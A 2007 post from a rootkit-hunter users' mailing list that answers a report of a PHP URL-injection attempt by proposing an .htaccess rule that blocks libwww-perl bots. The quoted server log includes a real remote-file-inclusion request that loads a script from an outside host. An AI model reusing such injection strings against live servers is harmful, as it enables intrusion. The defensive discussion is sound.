Hallo, Johan,

Du (johan.sundstrom) meintest am 03.12.07:

> IP Address of attacker: xxx.yyy.zzz.zzz

> Type of attack: URL Injection -- attempt to inject / load files onto
> the server via PHP/CGI vulnerabilities

> Sample log report including date and time stamp:

>   Request: onlinesurfnshop.com xxx.yyy.zzz.zzz - -
> [01/Dec/2007:16:59:21 -0800] "GET

> /logos/banners//index.php?skin_file=http://www.n0n-clan.net//vwar/con
> vert/test.txt? HTTP/1.1" 500 549 "-" "libwww-perl/5.805" - "-"

I stop these nasty scripts with an entry in the ".htaccess" file in the  
apache "DocumentRoot":

        BrowserMatchNoCase "^libwww-perl" botnet

        order allow,deny
        allow from all
        deny from env=botnet

You can choose another name than "botnet", you can add other definitions  
for this self defined environment variable(s). The "order/allow/deny"  
block first allows "all" and then blocks all defined requests.

Without this entry the tries result in error level 404 (or 500) in  
"error_log". With this entry they produce error level 403.

I have tried this entry on a website with about 2000 visits a day; over  
a month there was no "good" try with the Browser "libwww-perl". Only  
nasty scripts.

Viele Gruesse!
Helmut

-------------------------------------------------------------------------
SF.Net email is sponsored by: The Future of Linux Business White Paper
from Novell.  From the desktop to the data center, Linux is going
mainstream.  Let it simplify your IT future.
http://altfarm.mediaplex.com/ad/ck/8857-50307-18918-4
_______________________________________________
Rkhunter-users mailing list
Rkhunter-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/rkhunter-users

Reply via email to